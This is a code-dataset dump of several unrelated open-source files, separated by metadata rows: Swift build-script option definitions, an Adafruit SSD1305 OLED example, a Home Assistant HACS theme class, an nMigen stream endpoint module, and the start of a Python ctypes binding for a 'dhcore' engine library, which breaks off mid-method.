class UnsupportedOption(_BaseOption): pass class IgnoreOption(_BaseOption): pass class BuildScriptImplOption(_BaseOption): pass EXPECTED_OPTIONS = [ HelpOption('-h', dest='help', default=argparse.SUPPRESS), HelpOption('--help', dest='help', default=argparse.SUPPRESS), SetOption('--debug', dest='build_variant', value='Debug'), SetOption('--debug-cmark', dest='cmark_build_variant', value='Debug'), SetOption('--debug-foundation', dest='foundation_build_variant', value='Debug'), SetOption('--debug-libdispatch', dest='libdispatch_build_variant', value='Debug'), SetOption('--debug-libicu', dest='libicu_build_variant', value='Debug'), SetOption('--debug-lldb', dest='lldb_build_variant', value='Debug'), SetOption('--lldb-build-with-xcode', dest='lldb_build_with_xcode', value='1'), SetOption('--lldb-build-with-cmake', dest='lldb_build_with_xcode', value='0'), SetOption('--debug-llvm', dest='llvm_build_variant', value='Debug'), SetOption('--debug-swift', dest='swift_build_variant', value='Debug'), SetOption('--debug-swift-stdlib', dest='swift_stdlib_build_variant', value='Debug'), SetOption('--eclipse', dest='cmake_generator', value='Eclipse CDT4 - Ninja'), SetOption('--make', dest='cmake_generator', value='Unix Makefiles'), SetOption('--release', dest='build_variant', value='Release'), SetOption('--release-debuginfo', dest='build_variant', value='RelWithDebInfo'), SetOption('--min-size-release', dest='build_variant', value='MinSizeRel'), SetOption('--xcode', dest='cmake_generator', value='Xcode'), SetOption('-R', dest='build_variant', value='Release'), SetOption('-d', dest='build_variant', value='Debug'), SetOption('-e', dest='cmake_generator', value='Eclipse CDT4 - Ninja'), SetOption('-m', dest='cmake_generator', value='Unix Makefiles'), SetOption('-r', dest='build_variant', value='RelWithDebInfo'), SetOption('-x', dest='cmake_generator', value='Xcode'), SetOption('--assertions', value=True), SetOption('--cmark-assertions', value=True), SetOption('--lldb-assertions', value=True), SetOption('--llvm-assertions', value=True), SetOption('--llbuild-assertions', value=True), SetOption('--swift-assertions', value=True), SetOption('--swift-stdlib-assertions', value=True), SetOption('-T', dest='validation_test', value=True), SetOption('-o', dest='test_optimized', value=True), SetOption('-s', dest='test_optimize_for_size', value=True), SetOption('-y', dest='test_optimize_none_with_implicit_dynamic', value=True), SetOption('-t', dest='test', value=True), SetOption('-a', dest='assertions', value=True), SetOption('--no-assertions', dest='assertions', value=False), SetOption('-A', dest='assertions', value=False), SetOption('--no-lldb-assertions', dest='lldb_assertions', value=False), SetOption('--no-llvm-assertions', dest='llvm_assertions', value=False), SetOption('--no-llbuild-assertions', dest='llbuild_assertions', value=False), SetOption('--no-swift-assertions', dest='swift_assertions', value=False), SetOption('--no-swift-stdlib-assertions', dest='swift_stdlib_assertions', value=False), SetOption('--skip-ios', dest='ios', value=False), SetOption('--skip-tvos', dest='tvos', value=False), SetOption('--skip-watchos', dest='watchos', value=False), SetOption('--skip-test-early-swift-driver', dest='test_early_swift_driver', value=False), SetTrueOption('--benchmark'), SetTrueOption('--clean'), SetTrueOption('--dry-run'), SetTrueOption('--dump-config'), SetTrueOption('--disable-guaranteed-normal-arguments'), SetTrueOption('--enable-stdlibcore-exclusivity-checking'), SetTrueOption('--force-optimized-typechecker'), SetTrueOption('--ios'), SetTrueOption('--llbuild', dest='build_llbuild'), SetTrueOption('--lldb', dest='build_lldb'), SetTrueOption('--libcxx', dest='build_libcxx'), SetTrueOption('--maccatalyst', dest='maccatalyst'), SetTrueOption('--maccatalyst-ios-tests', dest='maccatalyst_ios_tests'), SetTrueOption('--playgroundsupport', dest='build_playgroundsupport'), SetTrueOption('--install-playgroundsupport', dest='install_playgroundsupport'), SetTrueOption('--skip-build'), SetTrueOption('--swiftpm', dest='build_swiftpm'), SetTrueOption('--swift-driver', dest='build_swift_driver'), SetTrueOption('--swiftsyntax', dest='build_swiftsyntax'), SetTrueOption('--build-libparser-only', dest='build_libparser_only'), SetTrueOption('--skstresstester', dest='build_skstresstester'), SetTrueOption('--swiftformat', dest='build_swiftformat'), SetTrueOption('--swiftevolve', dest='build_swiftevolve'), SetTrueOption('-B', dest='benchmark'), SetTrueOption('-S', dest='skip_build'), SetTrueOption('-b', dest='build_llbuild'), SetTrueOption('-c', dest='clean'), SetTrueOption('-i', dest='ios'), SetTrueOption('-l', dest='build_lldb'), SetTrueOption('-n', dest='dry_run'), SetTrueOption('-p', dest='build_swiftpm'), SetTrueOption('--legacy-impl', dest='legacy_impl'), SetTrueOption('--infer', dest='infer_dependencies'), EnableOption('--android'), EnableOption('--build-external-benchmarks'), EnableOption('--build-ninja'), EnableOption('--build-runtime-with-host-compiler'), EnableOption('--build-swift-dynamic-sdk-overlay'), EnableOption('--build-swift-dynamic-stdlib'), EnableOption('--build-swift-static-sdk-overlay'), EnableOption('--build-swift-static-stdlib'), EnableOption('--build-swift-stdlib-unittest-extra'), EnableOption('--distcc'), EnableOption('--sccache'), EnableOption('--enable-asan'), EnableOption('--enable-experimental-differentiable-programming'), EnableOption('--enable-experimental-concurrency'), EnableOption('--enable-lsan'), EnableOption('--enable-sanitize-coverage'), EnableOption('--enable-tsan'), EnableOption('--enable-tsan-runtime'), EnableOption('--enable-ubsan'), EnableOption('--export-compile-commands'), EnableOption('--foundation', dest='build_foundation'), EnableOption('--host-test'), EnableOption('--only-executable-test'), EnableOption('--only-non-executable-test'), EnableOption('--libdispatch', dest='build_libdispatch'), EnableOption('--libicu', dest='build_libicu'), EnableOption('--indexstore-db', dest='build_indexstoredb'), EnableOption('--test-indexstore-db-sanitize-all', dest='test_indexstoredb_sanitize_all'), EnableOption('--sourcekit-lsp', dest='build_sourcekitlsp'), EnableOption('--test-sourcekit-lsp-sanitize-all', dest='test_sourcekitlsp_sanitize_all'), EnableOption('--install-swiftsyntax', dest='install_swiftsyntax'), EnableOption('--swiftsyntax-verify-generated-files', dest='swiftsyntax_verify_generated_files'), EnableOption('--install-swiftpm', dest='install_swiftpm'), EnableOption('--install-swift-driver', dest='install_swift_driver'), EnableOption('--install-sourcekit-lsp', dest='install_sourcekitlsp'), EnableOption('--install-skstresstester', dest='install_skstresstester'), EnableOption('--install-swiftevolve', dest='install_swiftevolve'), EnableOption('--toolchain-benchmarks', dest='build_toolchainbenchmarks'), EnableOption('--swift-inspect', dest='build_swift_inspect'), EnableOption('--tsan-libdispatch-test'), EnableOption('--long-test'), EnableOption('--show-sdks'), EnableOption('--skip-local-build'), EnableOption('--stress-test'), EnableOption('--test'), EnableOption('--test-optimize-for-size'), EnableOption('--test-optimize-none-with-implicit-dynamic'), EnableOption('--test-optimized'), EnableOption('--tvos'), EnableOption('--validation-test'), EnableOption('--verbose-build'), EnableOption('--watchos'), EnableOption('--xctest', dest='build_xctest'), EnableOption('--swift-disable-dead-stripping'), EnableOption('--clean-early-swift-driver', dest='clean_early_swift_driver'), DisableOption('--skip-build-cmark', dest='build_cmark'), DisableOption('--skip-build-llvm', dest='build_llvm'), DisableOption('--skip-build-swift', dest='build_swift'), DisableOption('--skip-build-android', dest='build_android'), DisableOption('--skip-build-benchmarks', dest='build_benchmarks'), DisableOption('--skip-build-cygwin', dest='build_cygwin'), DisableOption('--skip-build-freebsd', dest='build_freebsd'), DisableOption('--skip-build-ios', dest='build_ios'), DisableOption('--skip-build-ios-device', dest='build_ios_device'), DisableOption('--skip-build-ios-simulator', dest='build_ios_simulator'), DisableOption('--skip-build-linux', dest='build_linux'), DisableOption('--skip-build-osx', dest='build_osx'), DisableOption('--skip-build-tvos', dest='build_tvos'), DisableOption('--skip-build-tvos-device', dest='build_tvos_device'), DisableOption('--skip-build-tvos-simulator', dest='build_tvos_simulator'), DisableOption('--skip-build-watchos', dest='build_watchos'), DisableOption('--skip-build-watchos-device', dest='build_watchos_device'), DisableOption('--skip-build-watchos-simulator', dest='build_watchos_simulator'), DisableOption('--skip-clean-llbuild', dest='clean_llbuild'), DisableOption('--skip-early-swift-driver', dest='build_early_swift_driver'), DisableOption('--skip-clean-swiftpm', dest='clean_swiftpm'), DisableOption('--skip-clean-swift-driver', dest='clean_swift_driver'), DisableOption('--skip-test-android', dest='test_android'), DisableOption('--skip-test-android-host', dest='test_android_host'), DisableOption('--skip-test-cygwin', dest='test_cygwin'), DisableOption('--skip-test-freebsd', dest='test_freebsd'), DisableOption('--skip-test-ios', dest='test_ios'), DisableOption('--skip-test-ios-32bit-simulator', dest='test_ios_32bit_simulator'), DisableOption('--skip-test-watchos-32bit-simulator', dest='test_watchos_32bit_simulator'), DisableOption('--skip-test-ios-host', dest='test_ios_host'), DisableOption('--skip-test-ios-simulator', dest='test_ios_simulator'), DisableOption('--skip-test-linux', dest='test_linux'), DisableOption('--skip-test-osx', dest='test_osx'), DisableOption('--skip-test-tvos', dest='test_tvos'), DisableOption('--skip-test-tvos-host', dest='test_tvos_host'), DisableOption('--skip-test-tvos-simulator', dest='test_tvos_simulator'), DisableOption('--skip-test-watchos', dest='test_watchos'), DisableOption('--skip-test-watchos-host', dest='test_watchos_host'), DisableOption('--skip-test-watchos-simulator', dest='test_watchos_simulator'), DisableOption('--skip-test-playgroundsupport', dest='test_playgroundsupport'), DisableOption('--skip-test-swiftpm', dest='test_swiftpm'), DisableOption('--skip-test-swift-driver', dest='test_swift_driver'), DisableOption('--skip-test-swiftsyntax', dest='test_swiftsyntax'), DisableOption('--skip-test-indexstore-db', dest='test_indexstoredb'), DisableOption('--skip-test-sourcekit-lsp', dest='test_sourcekitlsp'), DisableOption('--skip-test-skstresstester', dest='test_skstresstester'), DisableOption('--skip-test-swiftformat', dest='test_swiftformat'), DisableOption('--skip-test-swiftevolve', dest='test_swiftevolve'), DisableOption('--skip-test-toolchain-benchmarks', dest='test_toolchainbenchmarks'), DisableOption('--skip-test-swift-inspect', dest='test_swift_inspect'), DisableOption('--skip-build-clang-tools-extra', dest='build_clang_tools_extra'), ChoicesOption('--android-ndk-gcc-version', choices=['4.8', '4.9']), ChoicesOption('--compiler-vendor', choices=['none', 'apple']), ChoicesOption('--swift-analyze-code-coverage', choices=['false', 'not-merged', 'merged']), ChoicesOption('--android-arch', choices=['armv7', 'aarch64']), StrOption('--android-api-level'), StrOption('--build-args'), StrOption('--build-stdlib-deployment-targets'), StrOption('--darwin-deployment-version-ios'), StrOption('--darwin-deployment-version-osx'), StrOption('--darwin-deployment-version-tvos'), StrOption('--darwin-deployment-version-watchos'), StrOption('--darwin-xcrun-toolchain'), StrOption('--host-target'), StrOption('--lit-args'), StrOption('--llvm-targets-to-build'), StrOption('--stdlib-deployment-targets'), StrOption('--swift-darwin-module-archs'), StrOption('--swift-darwin-supported-archs'), PathOption('--android-deploy-device-path'), PathOption('--android-icu-i18n'), PathOption('--android-icu-i18n-include'), PathOption('--android-icu-uc'), PathOption('--android-icu-uc-include'), PathOption('--android-icu-data'), PathOption('--android-ndk'), PathOption('--build-subdir'), SetTrueOption('--relocate-xdg-cache-home-under-build-subdir'), PathOption('--clang-profile-instr-use'), PathOption('--cmake'), PathOption('--coverage-db'), PathOption('--host-cc'), PathOption('--host-cxx'), PathOption('--host-libtool'), PathOption('--host-lipo'), PathOption('--install-prefix'), PathOption('--install-symroot'), PathOption('--install-destdir'), EnableOption('--install-all'), PathOption('--native-clang-tools-path'), PathOption('--native-llvm-tools-path'), PathOption('--native-swift-tools-path'), PathOption('--symbols-package'), PathOption('--cmake-c-launcher'), PathOption('--cmake-cxx-launcher'), IntOption('--benchmark-num-o-iterations'), IntOption('--benchmark-num-onone-iterations'), IntOption('--jobs', dest='build_jobs'), IntOption('--llvm-max-parallel-lto-link-jobs'), IntOption('--swift-tools-max-parallel-lto-link-jobs'), IntOption('-j', dest='build_jobs'), IntOption('--dsymutil-jobs', dest='dsymutil_jobs'), AppendOption('--cross-compile-hosts'), AppendOption('--extra-cmake-options'), AppendOption('--extra-swift-args'), AppendOption('--test-paths'), AppendOption('--llvm-ninja-targets'), AppendOption('--llvm-ninja-targets-for-cross-compile-hosts'), AppendOption('--darwin-symroot-path-filters'), UnsupportedOption('--build-jobs'), UnsupportedOption('--common-cmake-options'), UnsupportedOption('--only-execute'), UnsupportedOption('--skip-test-optimize-for-size'), UnsupportedOption('--skip-test-optimize-none-with-implicit-dynamic'), UnsupportedOption('--skip-test-optimized'), BuildScriptImplOption('--skip-test-swift', dest='impl_skip_test_swift'), BuildScriptImplOption('--install-swift', dest='impl_install_swift'), SetOption('--lto', dest='lto_type'), ChoicesOption('--lto', dest='lto_type', choices=['thin', 'full']), # validate compiler version strings. IgnoreOption('--clang-compiler-version'), IgnoreOption('--clang-user-visible-version'), IgnoreOption('--swift-compiler-version'), IgnoreOption('--swift-user-visible-version'), # TODO: Migrate to unavailable options once new parser is in place IgnoreOption('-I'), IgnoreOption('--ios-all'), IgnoreOption('--tvos-all'), IgnoreOption('--watchos-all'), StrOption('--llvm-install-components'), ]
true
true
f728f523e3d2d32e7e3c55c564c297fd1e635901
1,969
py
Python
libralli/circcuitpython/adafruit-circuitpython-bundle-7.x-mpy-20211225/examples/displayio_ssd1305_simpletest.py
Yarik9008/SoftAcademic
118c9dc4620ca444c1557edd141a838820577202
[ "MIT" ]
1
2022-01-08T16:00:54.000Z
2022-01-08T16:00:54.000Z
libralli/circcuitpython/adafruit-circuitpython-bundle-7.x-mpy-20211225/examples/displayio_ssd1305_simpletest.py
Yarik9008/SoftAcademic
118c9dc4620ca444c1557edd141a838820577202
[ "MIT" ]
2
2020-12-05T02:58:20.000Z
2021-09-27T16:43:31.000Z
libralli/circcuitpython/adafruit-circuitpython-bundle-7.x-mpy-20211225/examples/displayio_ssd1305_simpletest.py
Yarik9008/SoftAcademic
118c9dc4620ca444c1557edd141a838820577202
[ "MIT" ]
4
2019-11-06T16:59:45.000Z
2021-10-31T22:05:00.000Z
# SPDX-FileCopyrightText: 2021 ladyada for Adafruit Industries # SPDX-License-Identifier: MIT """ This test will initialize the display using displayio and draw a solid white background, a smaller black rectangle, and some white text. """ import board import displayio import terminalio from adafruit_display_text import label import adafruit_displayio_ssd1305 displayio.release_displays() # Reset is usedfor both SPI and I2C oled_reset = board.D9 # Use for SPI spi = board.SPI() oled_cs = board.D5 oled_dc = board.D6 display_bus = displayio.FourWire( spi, command=oled_dc, chip_select=oled_cs, baudrate=1000000, reset=oled_reset ) # Use for I2C # i2c = board.I2C() # display_bus = displayio.I2CDisplay(i2c, device_address=0x3c, reset=oled_reset) WIDTH = 128 HEIGHT = 64 # Change to 32 if needed BORDER = 8 FONTSCALE = 1 display = adafruit_displayio_ssd1305.SSD1305(display_bus, width=WIDTH, height=HEIGHT) # Make the display context splash = displayio.Group() display.show(splash) color_bitmap = displayio.Bitmap(display.width, display.height, 1) color_palette = displayio.Palette(1) color_palette[0] = 0xFFFFFF # White bg_sprite = displayio.TileGrid(color_bitmap, pixel_shader=color_palette, x=0, y=0) splash.append(bg_sprite) # Draw a smaller inner rectangle inner_bitmap = displayio.Bitmap( display.width - BORDER * 2, display.height - BORDER * 2, 1 ) inner_palette = displayio.Palette(1) inner_palette[0] = 0x000000 # Black inner_sprite = displayio.TileGrid( inner_bitmap, pixel_shader=inner_palette, x=BORDER, y=BORDER ) splash.append(inner_sprite) # Draw a label text = "Hello World!" text_area = label.Label(terminalio.FONT, text=text, color=0xFFFFFF) text_width = text_area.bounding_box[2] * FONTSCALE text_group = displayio.Group( scale=FONTSCALE, x=display.width // 2 - text_width // 2, y=display.height // 2, ) text_group.append(text_area) # Subgroup for text scaling splash.append(text_group) while True: pass
26.253333
85
0.765871
import board import displayio import terminalio from adafruit_display_text import label import adafruit_displayio_ssd1305 displayio.release_displays() oled_reset = board.D9 spi = board.SPI() oled_cs = board.D5 oled_dc = board.D6 display_bus = displayio.FourWire( spi, command=oled_dc, chip_select=oled_cs, baudrate=1000000, reset=oled_reset ) WIDTH = 128 HEIGHT = 64 BORDER = 8 FONTSCALE = 1 display = adafruit_displayio_ssd1305.SSD1305(display_bus, width=WIDTH, height=HEIGHT) splash = displayio.Group() display.show(splash) color_bitmap = displayio.Bitmap(display.width, display.height, 1) color_palette = displayio.Palette(1) color_palette[0] = 0xFFFFFF bg_sprite = displayio.TileGrid(color_bitmap, pixel_shader=color_palette, x=0, y=0) splash.append(bg_sprite) inner_bitmap = displayio.Bitmap( display.width - BORDER * 2, display.height - BORDER * 2, 1 ) inner_palette = displayio.Palette(1) inner_palette[0] = 0x000000 inner_sprite = displayio.TileGrid( inner_bitmap, pixel_shader=inner_palette, x=BORDER, y=BORDER ) splash.append(inner_sprite) text = "Hello World!" text_area = label.Label(terminalio.FONT, text=text, color=0xFFFFFF) text_width = text_area.bounding_box[2] * FONTSCALE text_group = displayio.Group( scale=FONTSCALE, x=display.width // 2 - text_width // 2, y=display.height // 2, ) text_group.append(text_area) splash.append(text_group) while True: pass
true
true
f728f6bebe196dfc999874cdca77d254d18bd01b
1,799
py
Python
custom_components/hacs/repositories/hacsrepositorytheme.py
sjabby/home-assistant-conf
89f4bcea5daeddc1e657bc0d7f6db3197f6bddb8
[ "MIT" ]
3
2019-03-12T21:27:56.000Z
2019-05-03T06:18:48.000Z
custom_components/hacs/repositories/hacsrepositorytheme.py
sjabby/home-assistant-config
89f4bcea5daeddc1e657bc0d7f6db3197f6bddb8
[ "MIT" ]
null
null
null
custom_components/hacs/repositories/hacsrepositorytheme.py
sjabby/home-assistant-config
89f4bcea5daeddc1e657bc0d7f6db3197f6bddb8
[ "MIT" ]
null
null
null
"""Blueprint for HacsRepositoryThemes.""" # pylint: disable=too-many-instance-attributes,invalid-name,broad-except,access-member-before-definition import logging from .hacsrepositorybase import HacsRepositoryBase from ..hacsbase.exceptions import HacsRequirement _LOGGER = logging.getLogger("custom_components.hacs.repository") class HacsRepositoryThemes(HacsRepositoryBase): """ Set up a HacsRepositoryThemes object. repository_name(str): The full name of a repository (example: awesome-dev/awesome-repo) """ def __init__(self, repository_name: str, repositoryobject=None): """Initialize a HacsRepositoryThemes object.""" super().__init__() self.repository = repositoryobject self.repository_name = repository_name self.repository_type = "theme" self.manifest_content = None self.name = repository_name.split("/")[-1] async def update(self): """Run update tasks.""" if await self.comperson2_update(): return await self.set_repository_content() async def set_repository_content(self): """Set repository content attributes.""" contentfiles = [] if self.content_path is None: self.content_objects = await self.repository.get_contents( "themes", self.ref ) self.content_path = self.content_objects[0].path self.name = self.content_objects[0].name.replace(".yaml", "") if not isinstance(self.content_objects, list): raise HacsRequirement("Repository structure does not meet the requirements") for filename in self.content_objects: contentfiles.append(filename.name) if contentfiles: self.content_files = contentfiles
32.709091
104
0.675931
import logging from .hacsrepositorybase import HacsRepositoryBase from ..hacsbase.exceptions import HacsRequirement _LOGGER = logging.getLogger("custom_components.hacs.repository") class HacsRepositoryThemes(HacsRepositoryBase): def __init__(self, repository_name: str, repositoryobject=None): super().__init__() self.repository = repositoryobject self.repository_name = repository_name self.repository_type = "theme" self.manifest_content = None self.name = repository_name.split("/")[-1] async def update(self): if await self.comperson2_update(): return await self.set_repository_content() async def set_repository_content(self): contentfiles = [] if self.content_path is None: self.content_objects = await self.repository.get_contents( "themes", self.ref ) self.content_path = self.content_objects[0].path self.name = self.content_objects[0].name.replace(".yaml", "") if not isinstance(self.content_objects, list): raise HacsRequirement("Repository structure does not meet the requirements") for filename in self.content_objects: contentfiles.append(filename.name) if contentfiles: self.content_files = contentfiles
true
true
f728f6d0ff571bb845a5fc0cf5dbf16903315a1b
3,552
py
Python
proj/hps_accel/gateware/stream/stream.py
keadwen/CFU-Playground
74c79158e85e1365170ececd1d91ea3fa48faba0
[ "Apache-2.0" ]
240
2021-03-09T23:32:09.000Z
2022-03-28T14:54:08.000Z
proj/hps_accel/gateware/stream/stream.py
keadwen/CFU-Playground
74c79158e85e1365170ececd1d91ea3fa48faba0
[ "Apache-2.0" ]
283
2021-03-10T00:09:11.000Z
2022-03-31T16:39:40.000Z
proj/hps_accel/gateware/stream/stream.py
keadwen/CFU-Playground
74c79158e85e1365170ececd1d91ea3fa48faba0
[ "Apache-2.0" ]
78
2021-03-10T06:13:39.000Z
2022-03-30T14:09:00.000Z
#!/bin/env python # Copyright 2021 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # https://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from nmigen import Shape from nmigen.hdl.rec import Layout, Record __all__ = ['PayloadDefinition', 'Endpoint', 'connect'] class PayloadDefinition: """Defines a stream's payload Attributes ---------- payload_type: Shape or Layout The type of the payload. stream_layout: Layout A record Layout for a stream containing the given payload. """ @staticmethod def cast(obj, *, src_loc_at=0): """Returns a definition. Arguments --------- obj: PayloadDefinition or something that can be used in Layout - a Shape, a Layout or an iterable of tuples """ if isinstance(obj, PayloadDefinition): return obj return PayloadDefinition(payload_type=obj, src_loc_at=src_loc_at+1) def __init__(self, *, payload_type, src_loc_at=0): """Constructor. Arguments --------- payload_type: Shape or Layout The type of the payload. """ self.payload_type = payload_type self.stream_layout = Layout([ ("valid", Shape()), ("ready", Shape()), ("payload", payload_type), ], src_loc_at=1 + src_loc_at ) class Endpoint: """One endpoint of a stream Parameters ---------- definition: StreamDefintion Specifies the payload type and other parameters of this type. """ def __init__(self, definition=None, *, name=None, src_loc_at=0): self.definition = PayloadDefinition.cast(definition) self._record = Record( self.definition.stream_layout, name=name, src_loc_at=1 + src_loc_at) self.valid = self._record.valid self.ready = self._record.ready self.payload = self._record.payload @staticmethod def like(other): return Endpoint(other.definition) def is_transferring(self): """Is a transfer taking place this cycle? True iff valid and ready are both asserted. """ return self.valid & self.ready def connect(from_endpoint, to_endpoint): """Connects an upstream endpoint to a downstream endpoint. This is a convenience function only. Endpoint users may instead choose to write the 3 eq statements required to make a connection. Example uses: m.d.comb += connect(one_components_output, another_components_input) m.d.comb += connect(my_input, child_input) Arguments --------- from_endpoint: The upstream side of the stream. Presents payload and valid. to_endpoint: The downstream side of the stream. Presents ready. Result ------ A list of assignment statements to be used combinatorially. """ return [ to_endpoint.valid.eq(from_endpoint.valid), to_endpoint.payload.eq(from_endpoint.payload), from_endpoint.ready.eq(to_endpoint.ready), ]
27.75
75
0.642736
from nmigen import Shape from nmigen.hdl.rec import Layout, Record __all__ = ['PayloadDefinition', 'Endpoint', 'connect'] class PayloadDefinition: @staticmethod def cast(obj, *, src_loc_at=0): if isinstance(obj, PayloadDefinition): return obj return PayloadDefinition(payload_type=obj, src_loc_at=src_loc_at+1) def __init__(self, *, payload_type, src_loc_at=0): self.payload_type = payload_type self.stream_layout = Layout([ ("valid", Shape()), ("ready", Shape()), ("payload", payload_type), ], src_loc_at=1 + src_loc_at ) class Endpoint: def __init__(self, definition=None, *, name=None, src_loc_at=0): self.definition = PayloadDefinition.cast(definition) self._record = Record( self.definition.stream_layout, name=name, src_loc_at=1 + src_loc_at) self.valid = self._record.valid self.ready = self._record.ready self.payload = self._record.payload @staticmethod def like(other): return Endpoint(other.definition) def is_transferring(self): return self.valid & self.ready def connect(from_endpoint, to_endpoint): return [ to_endpoint.valid.eq(from_endpoint.valid), to_endpoint.payload.eq(from_endpoint.payload), from_endpoint.ready.eq(to_endpoint.ready), ]
true
true
f728f7c271ee7c605af31c7fecdfcc131b9064e8
19,096
py
Python
src/pytools/dheng/dhcore.py
septag/darkhammer
dd7e32737059ce6dba0aa79f1ae4a59137db06a7
[ "BSD-2-Clause" ]
68
2015-01-06T08:38:32.000Z
2022-01-20T15:26:17.000Z
src/pytools/dheng/dhcore.py
septag/darkhammer
dd7e32737059ce6dba0aa79f1ae4a59137db06a7
[ "BSD-2-Clause" ]
null
null
null
src/pytools/dheng/dhcore.py
septag/darkhammer
dd7e32737059ce6dba0aa79f1ae4a59137db06a7
[ "BSD-2-Clause" ]
12
2015-10-31T11:30:15.000Z
2020-04-13T18:31:17.000Z
import sys, os, inspect from ctypes import * import math MY_DIR = os.path.dirname(os.path.abspath(inspect.getframeinfo(inspect.currentframe())[0])) HELPER_DIR = os.path.abspath(os.path.join(MY_DIR, '..', 'helpers')) sys.path.append(HELPER_DIR) import dhlog class _API: is_init = False @staticmethod def init(debug=False): if _API.is_init: return postfix = '' if debug: postfix = '-dbg' if sys.platform == 'win32': shlib = 'dhcore' + postfix + '.dll' elif sys.platform == 'linux': shlib = 'libdhcore' + postfix + '.so' # load library try: dhcorelib = cdll.LoadLibrary(shlib) except: dhlog.Log.warn(str(sys.exc_info()[1])) dhlog.Log.fatal('could not load dynamic library %s' % shlib) sys.exit(-1) dhlog.Log.msgline('module "%s" loaded' % shlib, dhlog.TERM_GREEN) # core.h _API.core_init = dhcorelib.core_init _API.core_init.restype = c_int _API.core_init.argtypes = [c_uint] _API.core_release = dhcorelib.core_release _API.core_release.argtypes = [c_int] # err.h _API.err_getstring = dhcorelib.err_getstring _API.err_getstring.restype = c_char_p # log.h _API.log_outputconsole = dhcorelib.log_outputconsole _API.log_outputconsole.restype = c_uint _API.log_outputconsole.argtypes = [c_int] _API.log_outputfile = dhcorelib.log_outputfile _API.log_outputfile.restype = c_uint _API.log_outputfile.argtypes = [c_int, c_char_p] _API.log_isfile = dhcorelib.log_isfile _API.log_isfile.restype = c_int _API.log_isconsole = dhcorelib.log_isconsole _API.log_isconsole.restype = c_int _API.log_print = dhcorelib.log_print _API.log_print.argtypes = [c_uint, c_char_p] # file-io.h _API.fio_addvdir = dhcorelib.fio_addvdir _API.fio_addvdir.restype = c_int _API.fio_addvdir.argtypes = [c_char_p, c_int] # vec-math.h _API.mat3_muls = dhcorelib.mat3_muls _API.mat3_muls.restype = POINTER(Matrix3) _API.mat3_muls.argtypes = [POINTER(Matrix3), POINTER(Matrix3), c_float] _API.mat3_set_roteuler = dhcorelib.mat3_set_roteuler _API.mat3_set_roteuler.restype = POINTER(Matrix3) _API.mat3_set_roteuler.argtypes = [POINTER(Matrix3), c_float, c_float, c_float] _API.quat_slerp = dhcorelib.quat_slerp _API.quat_slerp.restype = POINTER(Quat) _API.quat_slerp.argtypes = [POINTER(Quat), POINTER(Quat), POINTER(Quat), c_float] _API.quat_fromaxis = dhcorelib.quat_fromaxis _API.quat_fromaxis.restype = POINTER(Quat) _API.quat_fromaxis.argtypes = [POINTER(Quat), POINTER(Vec3), c_float] _API.quat_fromeuler = dhcorelib.quat_fromeuler _API.quat_fromeuler.restype = POINTER(Quat) _API.quat_fromeuler.argtypes = [POINTER(Quat), c_float, c_float, c_float] _API.quat_frommat3 = dhcorelib.quat_frommat3 _API.quat_frommat3.restype = POINTER(Quat) _API.quat_frommat3.argtypes = [POINTER(Quat), POINTER(Matrix3)] _API.mat3_inv = dhcorelib.mat3_inv _API.mat3_inv.restype = POINTER(Matrix3) _API.mat3_inv.argtypes = [POINTER(Matrix3), POINTER(Matrix3)] _API.mat3_set_rotaxis = dhcorelib.mat3_set_rotaxis _API.mat3_set_rotaxis.restype = POINTER(Matrix3) _API.mat3_set_rotaxis.argtypes = [POINTER(Matrix3), POINTER(Vec3), c_float] _API.mat3_set_roteuler = dhcorelib.mat3_set_roteuler _API.mat3_set_roteuler.restype = POINTER(Matrix3) _API.mat3_set_roteuler.argtypes = [POINTER(Matrix3), c_float, c_float, c_float] _API.mat3_set_rotquat = dhcorelib.mat3_set_rotquat _API.mat3_set_rotquat.restype = POINTER(Matrix3) _API.mat3_set_rotquat.argtypes = [POINTER(Matrix3), POINTER(Quat)] _API.mat3_inv = dhcorelib.mat3_inv _API.mat3_inv.restype = POINTER(Matrix3) _API.mat3_inv.argtypes = [POINTER(Matrix3), POINTER(Matrix3)] _API.mat3_det = dhcorelib.mat3_det _API.mat3_det.restype = c_float _API.mat3_det.argtypes = [POINTER(Matrix3)] _API.is_init = True def IS_FAIL(r): if r <= 0: return True else: return False INVALID_HANDLE = 0xffffffffffffffff INVALID_INDEX = 0xffffffff def to_cstr(s): return create_string_buffer(s.encode('ascii')) class Errors: @staticmethod def last_error(): r = _API.err_getstring() return r.decode() class Log: class LogType: TEXT = 0 ERROR = 1 WARNING = 3, INFO = 3, LOAD = 4 @staticmethod def set_console_output(enable): _API.log_outputconsole(c_int(enable)) @staticmethod def set_file_output(logfile): if logfile != None: _API.log_outputfile(c_int(True), create_string_buffer(logfile.encode('ascii'))) else: _API.log_outputfile(c_int(False), None) @staticmethod def msg(log_type, msg): _API.log_print(c_uint(log_type), create_string_buffer(msg.encode('ascii'))) class Core: class InitFlags(): TRACE_MEM = (1<<0) CRASH_DUMP = (1<<1) LOGGER = (1<<2) ERRORS = (1<<3) JSON = (1<<4) FILE_IO = (1<<5) TIMER = (1<<6) ALL = 0xffffffff @staticmethod def init(flags = InitFlags.ALL): if IS_FAIL(_API.core_init(c_uint(flags))): raise Exception(_API.err_getstring()) @staticmethod def release(report_leaks = True): _API.core_release(c_int(report_leaks)) class Vec3(Structure): _fields_ = [('x', c_float), ('y', c_float), ('z', c_float), ('w', c_float)] def __init__(self, _x = 0, _y = 0, _z = 0, _w = 1): self.x = _x self.y = _y self.z = _z self.w = 1 def __add__(a, b): return Vec3(a.x + b.x, a.y + b.y, a.z + b.z) def __mul__(a, b): if type(b) is float or type(b) is int: return Vec3(a.x*b, a.y*b, a.z*b) elif type(b) is Matrix3: return Vec3(\ a.x*b.m11 + a.y*b.m21 + a.z*b.m31 + b.m41, a.x*b.m12 + a.y*b.m22 + a.z*b.m32 + b.m42, a.x*b.m13 + a.y*b.m23 + a.z*b.m33 + b.m43); def copy(self): return Vec3(self.x, self.y, self.z) def __div__(a, b): return Vec3(a.x/b, a.y/b, a.z/b) def __eq__(a, b): if a.x == b.x and a.y == b.y and a.z == b.z: return True else: return False def __sub__(a, b): return Vec3(a.x - b.x, a.y - b.y, a.z - b.z) def get_length(self): return math.sqrt(self.x*self.x + self.y*self.y + 